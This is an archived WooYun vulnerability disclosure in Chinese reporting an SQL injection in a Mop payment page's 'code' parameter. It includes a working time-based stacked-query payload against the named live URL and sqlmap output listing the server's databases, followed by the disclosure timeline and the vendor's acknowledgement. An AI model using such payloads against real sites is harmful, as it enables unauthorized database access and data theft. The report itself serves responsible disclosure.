乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-09: 厂商已经确认,细节仅向厂商公开 2015-11-19: 细节向核心白帽子及相关领域专家公开 2015-11-29: 细节向普通白帽子公开 2015-12-09: 细节向实习白帽子公开 2015-12-24: 细节向公众公开
已经有人提交过,但是别的修复了,这个没有修复<img src=" WooYun: 猫扑某站存在SQL注入 " alt="" />
http://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay
Parameter: code (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: code=Alipay';WAITFOR DELAY '0:0:5'-----[10:37:33] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, Nginx, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[10:37:33] [INFO] fetching database names[10:37:33] [INFO] fetching number of databases[10:37:33] [INFO] resumed: 8[10:37:33] [INFO] resumed: bbs[10:37:33] [INFO] resumed: master[10:37:33] [INFO] resumed: model[10:37:33] [INFO] resumed: msdb[10:37:33] [INFO] resumed: ReportServer[10:37:33] [INFO] resumed: Rem[10:37:33] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y[10:37:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [10:37:58] [INFO] adjusting time delay to 2 seconds due to good response timestempdb[10:38:55] [INFO] retrieved: xy003available databases [8]:[*] bbs[*] master[*] model[*] msdb[*] Rem[*] ReportServer[*] tempdb[*] xy003
ttp://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay
危害等级:中
漏洞Rank:5
确认时间:2015-11-09 13:15
谢谢,非常感谢!
暂无
